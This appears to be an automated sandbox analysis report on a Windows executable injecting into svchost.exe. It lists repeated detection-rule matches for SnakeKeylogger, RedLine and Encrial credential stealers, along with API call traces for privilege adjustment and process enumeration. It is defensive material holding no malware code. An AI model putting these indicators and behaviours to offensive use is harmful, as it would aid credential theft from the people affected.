              Source: 7.2.svchost.exe.81e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 7.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 7.2.svchost.exe.81e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 7.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 7.2.svchost.exe.81e0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 4.3.svchost.exe.326ef20.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 4.2.svchost.exe.7990f20.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 7.2.svchost.exe.8140f20.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 7.2.svchost.exe.8140f20.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 7.2.svchost.exe.8140f20.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 7.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 4.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 4.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.3.svchost.exe.326ef20.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.3.svchost.exe.326ef20.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 7.2.svchost.exe.81e0000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 7.2.svchost.exe.8140000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 7.3.svchost.exe.366cf20.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 7.3.svchost.exe.366cf20.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 7.3.svchost.exe.366cf20.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 4.2.svchost.exe.7d50000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 7.2.svchost.exe.81e0000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 4.2.svchost.exe.7d50000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.svchost.exe.7d50000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 4.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 4.2.svchost.exe.7990f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 7.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 4.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 7.2.svchost.exe.8140000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 7.2.svchost.exe.8140000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 4.2.svchost.exe.7990f20.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 4.2.svchost.exe.7990f20.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 7.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 7.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 7.3.svchost.exe.366c000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 7.2.svchost.exe.8140000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 7.3.svchost.exe.366c000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 7.2.svchost.exe.8140000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 7.3.svchost.exe.366c000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 7.2.svchost.exe.8140000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000007.00000002.3865282066.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000004.00000002.3865281483.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: Process Memory Space: svchost.exe PID: 8104, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: svchost.exe PID: 7524, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 4.3.svchost.exe.326ef20.0.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.3.svchost.exe.326ef20.0.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.3.svchost.exe.326ef20.0.raw.unpack, -i.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.2.svchost.exe.3374f2e.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.2.svchost.exe.3374f2e.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.2.svchost.exe.3374f2e.1.raw.unpack, -i.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.2.svchost.exe.7990f20.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.2.svchost.exe.7990f20.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.2.svchost.exe.7990f20.3.raw.unpack, -i.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.2.svchost.exe.7d50000.4.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.2.svchost.exe.7d50000.4.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/3@4/4
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0046CB5F OleInitialize,CLSIDFromProgID,CLSIDFromString,CoCreateInstance,CoInitializeSecurity,_wcslen,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0046CB5F
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
              Source: C:\Users\user\Desktop\kG713MWffq.exeFile created: C:\Users\user\AppData\Local\VideosJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMutant created: NULL
